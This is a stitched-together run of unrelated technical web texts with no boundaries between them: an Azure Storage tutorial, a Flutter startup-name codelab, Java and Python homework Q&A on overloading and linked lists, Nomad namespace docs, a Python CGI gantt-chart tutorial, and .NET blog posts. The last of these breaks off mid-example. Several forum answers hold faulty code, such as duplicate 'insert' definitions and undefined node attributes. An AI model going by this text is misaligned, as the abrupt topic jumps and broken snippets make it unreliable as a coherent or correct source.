Now, the attention in any tutorial on Azure Storage would divert towards the Azure storage types. You can find the types of Azure storage by reflecting on the data services available on the Azure Storage platform. Users can access the different types of Azure storage through their Azure Storage account. Here are the five types of Azure storage services.
- Azure Blobs
- Azure Queues
- Azure Disks
- Azure Tables
- Azure Files
Let us reflect on the details of these services to strengthen this Azure Storage tutorial.
1. Azure Blob Storage
Azure blob storage is the object storage solution of Microsoft, especially aimed at the cloud. The design of blob storage is effectively tailored for the storage of massive volumes of unstructured data in text and binary forms. Blob storage has many use cases: it is suitable for streaming video and audio, storing files for distributed access, and delivering images or documents directly to browsers.
In addition, blob storage is also fit for the storage of data for backup and restore, archiving, and disaster recovery. Blob storage also helps in data storage for analysis through an Azure-hosted or on-premises service. Client applications or users can access blobs through URLs, Azure CLI, Azure Storage REST API, an Azure Storage client library, or Azure PowerShell.
2. Queue Storage
The Azure Queue service is also an important addition in Azure Storage tutorial among types of Azure storage. It can help in the storage and retrieval of messages. Queue messages could be up to 64 KB in terms of size, and a queue has the capacity for containing millions of messages. Queues are generally applicable for storing a list of messages for asynchronous processing.
3. Disk Storage
Disk storage in Azure Storage is possible through an Azure managed disk. It is actually a virtual hard disk (VHD) that you can think of as a physical disk that has been virtualized. Azure managed disks are abstractions over page blobs, which are random IO storage objects in Azure. Managed disks are also abstractions over Azure storage accounts and blob containers. In the case of managed disks, users have to worry only about provisioning the disk while allowing Azure to manage the rest.
4. Table Storage
Table storage is also one of the prominent additions in the Azure Storage tutorial regarding the types of storage services. Azure Table storage is now available as a part of Azure Cosmos DB. The Azure Cosmos DB Table API offers automatic secondary indexes, throughput-optimized tables, and global distribution. Therefore, Azure Table storage also presents reliable claims as a better storage alternative on Azure.
5. Azure Files
The final and one of the notable entries in types of storage in an Azure Storage tutorial is Azure Files. Azure Files help in creating highly available network file shares accessible through the use of standard Server Message Block (SMB) protocol. As a result, it can ensure that multiple VMs could share the same files with reading as well as write access.
In addition, Azure Files also allow users to read the files through the storage client libraries or REST interface. Azure Files are different from files on a corporate file share due to their accessibility. Users can access Azure Files from anywhere in the world with a URL pointing to the file that also has a shared access signature (SAS) token. SAS tokens offer specific access to a private asset for a particular amount of time.
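For illustration (the account, share, file, and token values below are made up), such a URL has this general shape:

https://mystorageacct123.file.core.windows.net/myshare/report.docx?sv=2020-08-04&se=2021-08-01T00%3A00%3A00Z&sp=r&sig=<signature>

The query string carries the SAS token: the permitted operations (sp=r for read-only), the expiry time (se), and a signature (sig) that Azure validates before granting access.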
The Architecture of Azure Storage
The final aspect of an Azure Storage tutorial would refer to its architecture. Till now, you noticed the functionalities and different services on Azure Storage. So, it is inevitable to wonder how Azure Storage is capable of achieving its functionalities. Therefore, readers need a brief overview of the architecture of Azure Storage to understand it better.
The foremost aspect of Azure Storage architecture is that data on Azure Storage is automatically triplicated by default. In general, Azure Storage keeps three copies of the data inside a storage stamp, plus three more copies in another region when geo-resiliency is active. So, the discussion on the architecture of Azure Storage starts with a reflection on Stamps.
Azure Storage Stamps
Azure classifies entities into Stamps with each stamp having its own fabric controller. A particular Storage Stamp is actually a cluster of N racks of storage nodes, with each rack built out as a distinct fault domain having redundant power and networking. Azure Storage Stamps serve as a unit of deployment and management in data centers and help provide fault tolerance.
Location Service
The next important aspect of an Azure Storage tutorial about its architecture is the Location Service. The Location Service in Azure ensures efficient and responsible management of storage stamps. In addition, it is also responsible for managing account namespaces across all stamps. The Location Service is also distributed across two geographical locations for ensuring disaster recovery for itself.
Layers of Architecture in Azure Storage
Azure Storage relies on the architecture layers inside stamps for maintaining consistency, availability, and durability of data in a specific Azure Region. The Stream Layer or the Distributed File System (DFS) layer is the first layer of Azure Storage architecture.
The layer involves the storage of bits on disk and is responsible for the management of the disk. The Partition Layer in the architecture serves as the core essence of Azure Storage. It is the place where a major share of decision making happens on Azure Storage. The final layer, i.e., the Front End Layer, is necessary for obtaining a rest protocol for all Azure Storage abstractions.
Ready to Learn More About Azure Storage?
On a concluding note, there is a lot to learn about Azure Storage other than the information presented here. The above-mentioned Azure Storage tutorial definitely gives insights into the types and architecture of Azure Storage. However, you need to gain hands-on experience for understanding the functionalities of Azure Storage comprehensively.
For example, you can start by learning the steps in the process to create a new storage account. On the other hand, readers can also explore many other aspects of Azure Storage, such as types of authentication measures and storage accounts on Azure Storage. Dive into the world of Azure Storage to learn more right now!
If you’re aspiring to build a successful career in Azure, start learning now and validate your skills with one of the relevant Azure certifications. Don’t forget to check our Azure certification training courses that would help you prepare and pass your Azure certification.
In this codelab, you'll create a simple mobile Flutter app. If you're familiar with object-oriented code and basic programming concepts—such as variables, loops, and conditionals—then you can complete the codelab. You don't need previous experience with Dart or mobile programming.
In part 2 of this codelab, you'll add interactivity, modify the app's theme, and add the ability to navigate to a new page (called a route in Flutter).
You'll implement a simple mobile app that generates proposed names for a startup company. The user can select and unselect names, saving the best ones. The code lazily generates 10 names at a time. As the user scrolls, new batches of names are generated. The user can scroll forever with new names being continually generated.
The following animated GIF shows how the app works at the completion of part 1:
You need two pieces of software—the Flutter SDK and an editor. (The codelab assumes that you're using Android Studio, but you can use your preferred editor.)
You can run the codelab by using any of the following devices:
If you want to compile your app to run on the web, you must enable this feature (which is currently in beta). To enable web support, use the following instructions:
$ flutter channel beta
$ flutter upgrade
$ flutter config --enable-web

You need only run the config command once. After enabling web support, every Flutter app you create also compiles for the web. In your IDE under the devices pulldown, or at the command line using flutter devices, you should now see Chrome and Web server listed. For more information, see Building a web application with Flutter and Write your first Flutter app on the web.
Create a simple, templated Flutter app by using the instructions in Create the app. Enter startup_namer (instead of myapp) as the project name. You'll modify the starter app to create the finished app.
You'll mostly edit
lib/main.dart, where the Dart code lives.
Replace the contents of
lib/main.dart.
Delete all of the code from
lib/main.dart and replace it with the following code, which displays "Hello World" in the center of the screen:

import 'package:flutter/material.dart';

void main() => runApp(MyApp());

class MyApp extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return MaterialApp(
      title: 'Welcome to Flutter',
      home: Scaffold(
        appBar: AppBar(
          title: Text('Welcome to Flutter'),
        ),
        body: Center(
          child: const Text('Hello World'),
        ),
      ),
    );
  }
}
Run the app. You should see either Android or iOS output, depending on your device.
Observations
- The main() method uses fat arrow (=>) notation. Use arrow notation for one-line functions or methods.
- The app extends StatelessWidget, which makes the app itself a widget. In Flutter, almost everything is a widget, including alignment, padding, and layout.
- The Scaffold widget, from the Material library, provides a default app bar, a title, and a body property that holds the widget tree for the home screen. The widget subtree can be quite complex.
- A widget's main job is to provide a build method that describes how to display the widget in terms of other, lower-level widgets.
- The body for this example consists of a Center widget containing a Text child widget. The Center widget aligns its widget subtree to the center of the screen.
In this step, you'll start using an open-source package named
english_words, which contains a few thousand of the most-used English words, plus some utility functions.
You can find the
english_words package, as well as many other open-source packages, at pub.dev.
The pubspec file manages the assets for a Flutter app. In
pubspec.yaml, append
english_words: ^3.1.0 (
english_words 3.1.0 or higher) to the dependencies list:
dependencies:
  flutter:
    sdk: flutter
  cupertino_icons: ^0.1.2
  english_words: ^3.1.0  # add this line
While viewing the pubspec in Android Studio's editor view, click Packages get. This pulls the package into your project. You should see the following in the console:
flutter packages get
Running "flutter packages get" in startup_namer...
Process finished with exit code 0
In
lib/main.dart, import the new package:
import 'package:flutter/material.dart';
import 'package:english_words/english_words.dart';  // Add this line.

Use the package to generate the displayed text instead of the string 'Hello World':

import 'package:flutter/material.dart';
import 'package:english_words/english_words.dart';

void main() => runApp(MyApp());

class MyApp extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    final wordPair = WordPair.random();  // Add this line.
    return MaterialApp(
      title: 'Welcome to Flutter',
      home: Scaffold(
        appBar: AppBar(
          title: Text('Welcome to Flutter'),
        ),
        body: Center(
          //child: Text('Hello World'),        // Replace this text...
          child: Text(wordPair.asPascalCase),  // With this text.
        ),
      ),
    );
  }
}
If the app is running, hot reload to update it. Each time you hot reload or save the project, you should see a different, randomly chosen word pairing.
Stateless widgets are immutable, meaning that their properties can't change—all values are final.
Stateful widgets maintain state that might change during the lifetime of the widget. Implementing a stateful widget requires at least two classes: 1) a
StatefulWidget that creates an instance of a
State class. The
StatefulWidget object is, itself, immutable, but the
State object persists over the lifetime of the widget.
In this step, you'll add a stateful widget,
RandomWords, which creates its
State class,
RandomWordsState. You'll then use
RandomWords as a child inside the existing
MyApp stateless widget.
Create a
minimal state class. It can go anywhere in the file outside of
MyApp, but the solution places it at the bottom of the file. Add the following text:
class RandomWordsState extends State<RandomWords> {
  // TODO Add build method
}
Notice the declaration
State<RandomWords>. This indicates that you're using the generic
State class specialized for use with
RandomWords. Most of the app's logic and state resides here—it maintains the state for the
RandomWords widget. This class saves the list of generated word pairs, which grows infinitely as the user scrolls.
Add the
build() method to
RandomWordsState, as shown here:
class RandomWordsState extends State<RandomWords> {
  @override                                  // Add from this line ...
  Widget build(BuildContext context) {
    final WordPair wordPair = WordPair.random();
    return Text(wordPair.asPascalCase);
  }                                          // ... to this line.
}
Remove the word-generation code from
MyApp by making the following changes:
class MyApp extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    final WordPair wordPair = WordPair.random(); // Delete this line.
    return MaterialApp(
      title: 'Welcome to Flutter',
      home: Scaffold(
        appBar: AppBar(
          title: Text('Welcome to Flutter'),
        ),
        body: Center(
          //child: Text(wordPair.asPascalCase), // Change this line to...
          child: RandomWords(),                 // ... this line.
        ),
      ),
    );
  }
}

Restart the app, then add a
_suggestions list to the
RandomWordsState class for saving suggested word pairings. Also, add a
_biggerFont variable for making the font size larger.
class RandomWordsState extends State<RandomWords> {
  // Add the next two lines.
  final List<WordPair> _suggestions = <WordPair>[];
  final TextStyle _biggerFont = const TextStyle(fontSize: 18);
  ...
}

The ListView.builder used next provides an itemBuilder callback that is called once for every suggested word pairing. This model allows the suggestion list to grow infinitely as the user scrolls.
Add the entire
_buildSuggestions function to the
RandomWordsState class (delete the comments, if you prefer):
Widget _buildSuggestions() {
  return ListView.builder(
    padding: const EdgeInsets.all(16),
    // The itemBuilder callback is called once per suggested word
    // pairing, and places each suggestion into a ListTile row.
    itemBuilder: (BuildContext _context, int i) {
      // Add a one-pixel-high divider widget before each row
      // in the ListView.
      if (i.isOdd) {
        return Divider();
      }
      // The syntax "i ~/ 2" divides i by 2 and returns an integer
      // result. This calculates the actual number of word pairings
      // in the ListView, minus the divider widgets.
      final int index = i ~/ 2;
      // If you've reached the end of the available word pairings,
      // generate 10 more and add them to the suggestions list.
      if (index >= _suggestions.length) {
        _suggestions.addAll(generateWordPairs().take(10));
      }
      return _buildRow(_suggestions[index]);
    });
}

The _buildSuggestions function calls _buildRow once per word pair. That function displays each new pair in a
ListTile, which allows you to make the rows more attractive in part 2.
Add a
_buildRow function to
RandomWordsState:
Widget _buildRow(WordPair pair) {
  return ListTile(
    title: Text(
      pair.asPascalCase,
      style: _biggerFont,
    ),
  );
}
Update the
build method for
RandomWordsState to use
_buildSuggestions(), rather than directly calling the word-generation library. (
Scaffold implements the basic Material Design visual layout.)
@override
Widget build(BuildContext context) {
  //final wordPair = WordPair.random();  // Delete these...
  //return Text(wordPair.asPascalCase);  // ... two lines.
  return Scaffold(                       // Add from here...
    appBar: AppBar(
      title: Text('Startup Name Generator'),
    ),
    body: _buildSuggestions(),
  );                                     // ... to here.
}
Update the
build method for
MyApp, changing the title, and changing the home property to a
RandomWords widget.
@override
Widget build(BuildContext context) {
  return MaterialApp(
    title: 'Startup Name Generator',
    home: RandomWords(),
  );
}
Restart the app. You should see a list of word pairings no matter how far you scroll.
Problems?
If your app isn't running correctly, you can use the code at the following link to get back on track.
You have completed part 1 of this codelab! If you'd like to extend this app, proceed to part 2, where you will modify the app as follows:
When part 2 is completed, the app will look like this:
Learn more about the Flutter SDK with the following resources:
Other resources include the following:
Please reach out to us at our mailing list. We'd love to hear from you!
I am having trouble figuring out what I am doing. If anyone can help me it would be appreciated. Here are the requirements:
Write a Java program that computes the distance between two points on a number plane (of x and y). In the server class, define the overloaded methods that computes distances of 1) two integer coordinates, 2) two real number coordinates, 3) two whole number coordinates defined as two Point objects, and 4) an integer coordinates and the origin of the number plane.
Here is the code I have so far but I don't think I am doing it right.
//Start Code
import java.util.Random;
public class Distance
{
public static void main (String[] args) {
int x1, y1, x2, y2;
double dist;
final int num;
Random generator = new Random();
x1 = generator.nextInt();
x2 = generator.nextInt();
y1 = generator.nextInt();
y2 = generator.nextInt();
dist = Math.sqrt(Math.pow(x1 - x2, 2) +
Math.pow(y1 - y2, 2));
//Integer
System.out.println("The distance between (" + x1 +
"," + y1 + ") and (" + x2 + "," +
y2 + ") is " + (int)dist);
//Real
System.out.println("The distance between (" + x1 +
"," + y1 + ") and (" + x2 + "," +
y2 + ") is " + (double)dist);
}
}
//End Code
Instead of casting the result to an int or double, the assignment says you should overload the methods. That means you would have something like:
Code:
public int distance(int x, int y) {
//code
}
public double distance(double x, double y) {
//code
}
As for the Point objects, you could define a point simply as having an x and y coordinate, and calculate the distance using the same formula, but with a new method which receives Point objects instead of separate variables:
Code:
public double distance(Point p) {
//code
}
You can also overload these to return double or int
public int distance(int x, int y) {
//code
}
public double distance(double x, double y) {
//code
}
public double distance(Point p) {
//code
}
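Putting it together, a minimal sketch of the server class might look like this (the Point class and the class name DistanceServer are illustrative assumptions, not given by the assignment):

// Minimal sketch; names other than distance() are illustrative.
public class DistanceServer {

    public static class Point {
        public int x, y;
        public Point(int x, int y) { this.x = x; this.y = y; }
    }

    // 1) distance between two integer coordinates
    public double distance(int x1, int y1, int x2, int y2) {
        return Math.sqrt(Math.pow(x1 - x2, 2) + Math.pow(y1 - y2, 2));
    }

    // 2) distance between two real-number coordinates
    public double distance(double x1, double y1, double x2, double y2) {
        return Math.sqrt(Math.pow(x1 - x2, 2) + Math.pow(y1 - y2, 2));
    }

    // 3) distance between two whole-number coordinates given as Points
    public double distance(Point p1, Point p2) {
        return distance(p1.x, p1.y, p2.x, p2.y);
    }

    // 4) distance from an integer coordinate to the origin (0, 0)
    public double distance(int x, int y) {
        return distance(x, y, 0, 0);
    }
}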
Linked List in Python- Append, Index, Insert, and Pop functions. Not sure with code/errors
This assignment asks us to implement the append, insert, index and pop methods for an unordered linked-list. (What I have so far)
def main():
    class Node:
        def __init__(self, data):
            self.data = data
            self.next_node = None

    class LinkedList:
        def __init__(self):
            self.head = None
            self.tail = None

        def AppendNode(self, data):
            new_node = Node(data)
            if self.head == None:
                self.head = new_node
            if self.tail != None:
                self.tail.next = new_node
            self.tail = new_node

        def PrintList(self):
            node = self.head
            while node != None:
                print(node.data)
                node = node.next

        def PopNode(self, index):
            prev = None
            node = self.head
            i = 0
            while (node != None) and (i < index):
                prev = node
                node = node.next
                i += 1
            if prev == None:
                self.head = node.next
            else:
                prev.next = node.next

    list = LinkedList()
    list.AppendNode(1)
    list.AppendNode(2)
    list.AppendNode(3)
    list.AppendNode(4)
    list.PopNode(0)
    list.PrintList()
The output so far:
2
3
4
Traceback (most recent call last):
  File "<pyshell#32>", line 1, in <module>
    main()
  File "<pyshell#31>", line 50, in main
    list.PrintList( )
  File "<pyshell#31>", line 27, in PrintList
    node = node.next
AttributeError: 'Node' object has no attribute 'next'
I'm not sure why i'm getting the errors, since the code is technically working. Also any input on the insert, and index functions would be greatly appreciated.
Answers
For insert and index methods you will need another Node attribute, because you'll need to keep track of which item is on what position. Let we call it position. Your Node class will now look like this:
class Node:
    def __init__(self, data, position = 0):
        self.data = data
        self.next_node = None
        self.position = position
Retrieving index value now is easy as:
def index(self, item):
    current = self.head
    while current != None:
        if current.data == item:
            return current.position
        else:
            current = current.next
    print("item not present in list")
As for the list-altering methods, I would start with a simple add method which adds items to the leftmost position in the list:
def add(self, item):
    temp = Node(item)            # create a new node with the `item` value
    temp.next = self.head        # putting this new node as the first (leftmost) item in a list is a two-step process. First step is to point the new node to the old first (leftmost) value
    self.head = temp             # and second is to set the `LinkedList` `head` attribute to point at the new node. Done!
    current = self.head          # now we need to correct position values of all items. We start by assigning `current` to the head of the list
    self.index_correct(current)  # and we'll write a helper `index_correct` method to do the actual work.
    current = self.head
    previous = None
    while current.position != self.size() - 1:
        previous = current
        current = current.next
        current.back = previous
    self.tail = current
What shall the index_correct method do? Just one thing - to traverse the list in order to correct index position of items, when we add new items (for example: add, insert etc.), or remove them (remove, pop, etc.). So here's what it should look like:
def index_correct(self, value):
    position = 0
    while value != None:
        value.position = position
        position += 1
        value = value.next
It is plain simple. Now, let's implement insert method, as you requested:
def insert(self, item, position):
    if position == 0:
        self.add(item)
    elif position > self.size():
        print("position index out of range")
    elif position == self.size():
        self.AppendNode(item)
    else:
        temp = Node(item, position)
        current = self.head
        previous = None
        while current.position != position:
            previous = current
            current = current.next
        previous.next = temp
        temp.next = current
        temp.back = previous
        current.back = temp
        current = self.head
        self.index_correct(current)
def insert(self, item, position):
    if position == 0:
        self.add(item)
    elif position > self.size():
        print("Position index is out of range")
    elif position == self.size():
        self.append(item)
    else:
        temp = Node.Node(item, position)
        current = self.head
        previous = None
        current_position = 0
        while current_position != position:
            previous = current
            current = current.next
            current_position += 1
        previous.next = temp
        temp.next = current
Below is the implementation that I could come up with (tested and working). It seems to be an old post, but I couldn't find the complete solution for this anywhere, so posting it here.
# add -- O(1)
# size -- O(1) & O(n)
# append -- O(1) & O(n)
# search -- O(n)
# remove -- O(n)
# index -- O(n)
# insert -- O(n)
# pop -- O(n)  # can be O(1) if we use doubly linked list
# pop(k) -- O(k)

class Node:
    def __init__(self, initdata):
        self.data = initdata
        self.next = None

    def getData(self):
        return self.data

    def getNext(self):
        return self.next

    def setNext(self, newnext):
        self.next = newnext


class UnorderedList:
    def __init__(self):
        self.head = None
        self.tail = None
        self.length = 0

    def isEmpty(self):
        return self.head is None

    def add(self, item):
        temp = Node(item)
        temp.setNext(self.head)
        self.head = temp
        if self.tail is None:
            self.tail = temp
        self.length += 1

    def ssize(self):  # This is O(n)
        current = self.head
        count = 0
        while current is not None:
            count += 1
            current = current.getNext()
        return count

    def size(self):  # This is O(1)
        return self.length

    def search(self, item):
        current = self.head
        found = False
        while current is not None and not found:
            if current.getData() == item:
                found = True
            else:
                current = current.getNext()
        return found

    def remove(self, item):
        current = self.head
        previous = None
        found = False
        while current is not None and not found:
            if current.getData() == item:
                found = True
            else:
                previous = current
                current = current.getNext()
        if previous == None:
            # The item is the 1st item
            self.head = current.getNext()
        else:
            if current.getNext() is None:
                self.tail = previous  # in case the current tail is removed
            previous.setNext(current.getNext())
        self.length -= 1

    def __str__(self):
        current = self.head
        string = '['
        while current is not None:
            string += str(current.getData())
            if current.getNext() is not None:
                string += ', '
            current = current.getNext()
        string += ']'
        return string

    def sappend(self, item):  # This is O(n) time complexity
        current = self.head
        if current:
            while current.getNext() is not None:
                current = current.getNext()
            current.setNext(Node(item))
        else:
            self.head = Node(item)

    def append(self, item):  # This is O(1) time complexity
        temp = Node(item)
        last = self.tail
        if last:
            last.setNext(temp)
        else:
            self.head = temp
        self.tail = temp
        self.length += 1

    def insert(self, index, item):
        temp = Node(item)
        current = self.head
        previous = None
        count = 0
        found = False
        if index > self.length - 1:
            raise IndexError('List Index Out Of Range')
        while current is not None and not found:
            if count == index:
                found = True
            else:
                previous = current
                current = current.getNext()
                count += 1
        if previous is None:
            temp.setNext(self.head)
            self.head = temp
        else:
            temp.setNext(current)
            previous.setNext(temp)
        self.length += 1

    def index(self, item):
        pos = 0
        current = self.head
        found = False
        while current is not None and not found:
            if current.getData() == item:
                found = True
            else:
                current = current.getNext()
                pos += 1
        if not found:
            raise ValueError('Value not present in the List')
        return pos

    def pop(self, index=None):
        if index is None:
            index = self.length - 1
        if index > self.length - 1:
            raise IndexError('List Index Out Of Range')
        current = self.head
        previous = None
        found = False
        if current:
            count = 0
            while current.getNext() is not None and not found:
                if count == index:
                    found = True
                else:
                    previous = current
                    current = current.getNext()
                    count += 1
            if previous is None:
                self.head = current.getNext()
                if current.getNext() is None:
                    self.tail = current.getNext()
            else:
                self.tail = previous
                previous.setNext(current.getNext())
            self.length -= 1
            return current.getData()
Notice that in the Node class you defined the "next" field as "next_node". Therefore the interpreter doesn't know "next". So, instead of node.next it should be node.next_node
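A minimal sketch of the fix, shown for the two methods the traceback touches (rename consistently to next_node everywhere the list is linked or traversed):

# Sketch of the fix: use the attribute the Node class actually defines.
def AppendNode(self, data):
    new_node = Node(data)
    if self.head == None:
        self.head = new_node
    if self.tail != None:
        self.tail.next_node = new_node   # was: self.tail.next
    self.tail = new_node

def PrintList(self):
    node = self.head
    while node != None:
        print(node.data)
        node = node.next_node            # was: node.next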
Nomad has support for namespaces, which allow jobs and their associated objects to be segmented from each other and other users of the cluster.
Nomad places all jobs and their derived objects into namespaces. These include jobs, allocations, deployments, and evaluations.
Nomad does not namespace objects that are shared across multiple namespaces. This includes nodes, ACL policies, Sentinel policies, and quota specifications.
In this guide, you'll create and manage a namespace with the CLI. After creating the namespace, you then learn how to deploy and manage a job within that namespace. Finally, you practice securing the namespace.
»Create and view a namespace
You can manage namespaces with the
nomad namespace subcommand.
Create the namespace of a cluster.
$ nomad namespace apply -description "QA instances of webservers" web-qa Successfully applied namespace "web-qa"!
List the namespaces of a cluster.
$ nomad namespace list Name Description default Default shared namespace api-prod Production instances of backend API servers api-qa QA instances of backend API servers web-prod Production instances of webservers web-qa QA instances of webservers
»Run a job in a namespace
To run a job in a specific namespace, annotate the job with the namespace parameter. If omitted, the job runs in the default namespace. For example:

job "rails-www" {
  # Run in the QA environments
  namespace = "web-qa"

  # Only run in one datacenter when QAing
  datacenters = ["us-west1"]

  # ...
}
»Use namespaces in the CLI and UI
»Nomad CLI
When using commands that operate on objects that are namespaced, the namespace
can be specified either with the flag
-namespace or read from the
NOMAD_NAMESPACE environment variable.
Request job status using the
-namespace flag.
$ nomad job status -namespace=web-qa ID Type Priority Status Submit Date rails-www service 50 running 09/17/17 19:17:46 UTC
Export the
NOMAD_NAMESPACE environment variable.
$ export NOMAD_NAMESPACE=web-qa
Use the exported environment variable to request job status.
$ nomad job status ID Type Priority Status Submit Date rails-www service 50 running 09/17/17 19:17:46 UTC
»Nomad UI
The Nomad UI provides a drop-down menu to allow operators to select the namespace that they would like to control. The drop-down will appear once there are namespaces defined. It is located in the top section of the left-hand column of the interface under the "WORKLOAD" label.
»Secure a namespace
Access to namespaces can be restricted using ACLs. As an example, you could create an ACL policy that allows full access to the QA environment for the web namespaces but restrict the production access by creating the following policy:
# Allow read only access to the production namespace
namespace "web-prod" {
  policy = "read"
}

# Allow writing to the QA namespace
namespace "web-qa" {
  policy = "write"
}
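Assuming the policy above were saved as web-access.hcl, it could be registered with a command along these lines (the policy name and description are placeholders):

$ nomad acl policy apply -description "Web namespace access" web-access web-access.hcl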
»Learn more about namespaces
For specific details about working with namespaces, consult the namespace commands and HTTP API documentation.
With what we've learned and a little bit of HTML, view.cgi is easy. It needs to:

- pull the tasks out of the shelf;
- use an <img> tag to display the image (by setting the src attribute to chart.cgi);
- display a link to edit each task.
The script is mostly plain HTML or code we've already seen, except for the last item, displaying a link to edit each task. This requires a loop:
# display the tasks as links:
for row in range(len(tasks)):
print '<li><a href="controller.cgi?action=edit&row=%i">%s</a>' \
% (row, tasks[row]["label"])
print ' [<a href="controller.cgi?action=delete&row=%i">delete<a>]</li>' \
% row
Make sure that the web server has rights to read and write
model.shelf, and load
view.cgi in your
browser. If you run this cgi script now, you will see a broken image
and the list of tasks. Next we will work on the chart.
To create the image, we'll use the original gantt chart code, with three major changes. The new version will:

- pull 'now', 'tasks', and 'titles' out of our shelf;
- set the content-type to image/jpeg;
- write the image to standard output.
The first two changes are simple; the third is trickier. In theory,
we'd just save the piddle canvas to
sys.stdout, but there
are two problems with this approach.
The first problem is that
piddlePIL doesn't allow
saving images to file objects. Since it comes with full source,
however, we can fix it ourselves. Search in
piddlePIL.py
for the
save method. You'll see the problem. A couple
lines down, there's a bit of code that says:
if hasattr(file, 'write'): raise 'fileobj not implemented for piddlePIL'
Replace that with the following:
if hasattr(file, 'write'): self._image.save(file, format) return
Now, displaying the image on the web is easy. Here's the code, from
the bottom part of
chart.cgi:
print "content-type: image/jpeg" print import sys c.save(file=sys.stdout, format="jpeg")
The second problem only happens under Windows: the output gets
corrupted because
stdout is not in binary mode by
default. The fix is arcane, but concise:
import os, sys if sys.platform=="win32": import msvcrt msvcrt.setmode(sys.__stdin__.fileno(), os.O_BINARY) msvcrt.setmode(sys.__stdout__.fileno(), os.O_BINARY)
Place this before the content-type line and
chart.cgi
should have no problem displaying the image.
The controller is in charge of managing our data. Essentially, it does four things:
By default,
controller.cgi shows the "add" form. A
parameter called
action tells it to do something else. We
can pass
action, either as part of a query string (data
following the question mark in a URL) or via a form submission. The
cgi module can handle either method through the
FieldStorage class.
FieldStorage can be
treated almost like a dictionary, although it doesn't implement
every dictionary method. For simple cases like this, it returns values
as
cgi.MiniFieldStorage objects. The following code
shows
FieldStorage in action:
import cgi request = cgi.FieldStorage() action = "add" # by default if request.has_key("action"): action = request["action"].value
In
controller.cgi, a set of if/elif blocks looks at
the
action parameter and calls the appropriate
function. In a sense, the controller is several CGI scripts rolled
into one. We could have broken these into separate files, but I prefer
to keep related logic together.
Some of the available actions don't return a page to the browser
but, instead, redirect it to another page. In our case,
saveTask and
deleteTask both call
backToView, which returns a
Location header
rather than a content type. The following line sends the browser back
to the view page:
print "Location: view.cgi"
The rest of
controller.cgi, including the code to save
and delete tasks, is pretty straightforward. Consult the source for details.
That's it for this whirlwind tour of the gantt chart CGI application. To recap, we've seen how to store and retrieve data from a python shelf, communicate with the browser through CGI, and use piddlePIL to generate graphics in real time on the Web.
There is a massive and growing industry trend to use a set of principles called the SOLID principles. If you haven't come across these, go and read up on them.
These principles were put together by Robert C. Martin (aka Uncle Bob) and popularized in his book called Agile PPP.
Now, Uncle Bob isn't one for being shy or self-deprecating. His presentation style is in your face. This is what makes him immensely entertaining.
It is also what makes his audience believe his philosophy is black-and-white without a hint of pragmatism. They believe the SOLID principles should be used EVERYWHERE. That the abstraction promoted by SOLID is a noble goal. That the SOLID principles are the pinnacle of Object Oriented Design.
They are wrong.
They have either not read, or mis-read his Agile PPP book. They have not read the numerous insights Uncle Bob has written on the subject. So let me help by quoting Uncle Bob. If these are a surprise to you, PLEASE temper your love of SOLID and go read up on Primitive Obsession.
I quite agree that a dogmatic or religious application of the SOLID principles is neither realistic nor beneficial. If you had read through any of the articles and/or books I’ve written on these principles over the last 15 years, you’d have found that I don’t recommend the religious or dogmatic approach you blamed me for. In short, you jumped to a erroneous conclusion about me, and about the principles, because you weren’t familiar with the material.
An axis of change is an axis of change only if the changes occur. It is not wise to apply SRP - or any other principle, for that matter - if there is no symptom.
Clearly, we want to limit the application of OCP to changes that are likely.
Page 129, Agile Principles, Patterns and Practices in C#
A recent paper by Microsoft research has discovered a concurrency bug in the .Net JIT. They used the F# theorem prover to analyze the JIT il->x86 transformations which were previously thought to comply with the .Net memory model. These bugs show that writing correct concurrent (multi-threaded) code is hard - and in a multi-core world we need to find a way to provably write correct code.
"This discovery means that the current CLR JIT
compiler for the x86 platform is not correct; it will be fixed in the
future by strictly emitting locked instructions for all volatile stores"
-
via LtU
The C# team has been fairly candid in the features they are considering for C# v4. You just have to look hard enough. We'll know what they decide on soon enough as the PDC is just around the corner. Declarative side-effect free methods, Contra/covariance of arguments/return values, Declarative dynamic dispatch (VB-style object access). These all sound great. Perhaps I can add a few suggestions of my own not just for C# but for .Net in general:
A few ideas for .Net vnext:
As for Visual Studio:
In the System.Data namespace, there's a ConnectionState enumeration. This has values like Open, Closed, Connecting, Fetching to represent the state of a database connection.
I pondered on whether a connection which is "Fetching" is also "Open". It turns out that ConnectionState is declared with the FlagsAttribute - The mono DocComment for this enumeration says it best:
/// This enumeration has a FlagsAttribute that allows a bitwise combination of its member values.
Great - so now I can do something like:
if((connection.State & ConnectionState.Open)==ConnectionState.Open) ...
Wrong! Further down the MSDN documentation for ConnectionState, tucked away in the Remarks section is the following paragraph:
The values in this enumeration are not designed to be used as a set of flags.
Great. So the question is, which of the database providers follow the FlagsAttribute, and which follow the documentation comment? Does SQL Server treat ConnectionState as flags? Does the managed Oracle provider? Does Oracle's ODP.Net provider treat it as flags? etc.
Certainly there are many people who treat it like flags. There are equally many people who ignore it.
I think I know this history behind this debacle - if anyone knows for sure, I'd like to know. If you actually look at the ConnectionState definition, you will see that ConnectionState.Closed has a value of 0. This flouts the .Net Design Guidelines and I expect it to be raised by FxCop/CodeAnalysis. Go ahead and read that link if you're not sure why bitwise comparison with 0 is a bad idea. This means there are a lot of bugs about due to the use of Bitwise comparison of ConnectionState.Closed. So I suspect that the System.Data team realized they'd made a mistake and was unable to retroactively remove the FlagsAttribute - so their approach was to document the issue in an obscure remark.
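A small sketch makes the zero-value problem concrete (illustrative only):

// Illustrative sketch: ConnectionState.Closed is 0, so a bitwise test
// against it is always true, whatever the actual state.
using System;
using System.Data;

class FlagsBug
{
    static void Main()
    {
        ConnectionState state = ConnectionState.Open | ConnectionState.Fetching;

        // (state & 0) == 0 holds for every possible state.
        bool looksClosed =
            (state & ConnectionState.Closed) == ConnectionState.Closed;

        Console.WriteLine(looksClosed); // True, even though the state is Open
    }
}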
Back in 2000 when the CLR was first shown it's generational garbage collector was fairly cutting edge. But it's weaknesses show it's age - and it desperately needs updating.
Here's an example of just one of the ways the current GC (.Net 3.5) doesn't work:
A .Net process with a number of threads has just saved a large amount of data to a database. All of these threads could potentially allocate memory which causes a GC collection. However, saving the data to the database is a fairly long operation and thus the data gets promoted into the GC's generation 2.
